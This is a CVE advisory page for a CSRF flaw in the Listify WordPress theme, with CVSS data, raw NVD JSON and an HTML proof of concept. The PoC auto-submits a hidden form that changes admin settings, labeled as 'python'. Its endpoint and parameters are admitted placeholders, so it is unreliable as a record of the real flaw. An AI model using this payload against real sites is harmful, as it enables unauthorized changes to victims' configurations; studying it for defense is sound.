Security Vulnerability Report
中文
CVE-2025-59009 CVSS 4.3 MEDIUM

CVE-2025-59009

Published: 2025-12-16 09:15:53
Last Modified: 2026-04-15 00:35:42

Description

Cross-Site Request Forgery (CSRF) vulnerability in Astoundify Listify listify allows Cross Site Request Forgery.This issue affects Listify: from n/a through <= 3.2.5.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Astoundify Listify <= 3.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-59009 --> <!-- This PoC demonstrates the CSRF vulnerability in Listify theme --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2025-59009</title> </head> <body> <h1>CSRF PoC for Listify Theme (CVE-2025-59009)</h1> <p>When the logged-in admin visits this page, the form will auto-submit.</p> <!-- Example CSRF form - Replace action URL and parameters based on actual vulnerable endpoint --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- Listify theme security nonce - attacker cannot generate valid nonce --> <!-- But since CSRF protection is missing, no nonce validation occurs --> <input type="hidden" name="action" value="listify_settings_update"> <input type="hidden" name="listify_settings[example]" value="malicious_value"> <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=listify-settings"> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); // Optional: Redirect after submission // setTimeout(function() { // window.location.href = 'https://target-site.com/wp-admin/admin.php?page=listify-settings'; // }, 1000); </script> <p><strong>Defense:</strong> Add CSRF tokens (wp_nonce_field) to all state-changing forms.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59009", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:52.977", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Astoundify Listify listify allows Cross Site Request Forgery.This issue affects Listify: from n/a through <= 3.2.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/listify/vulnerability/wordpress-listify-theme-3-2-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}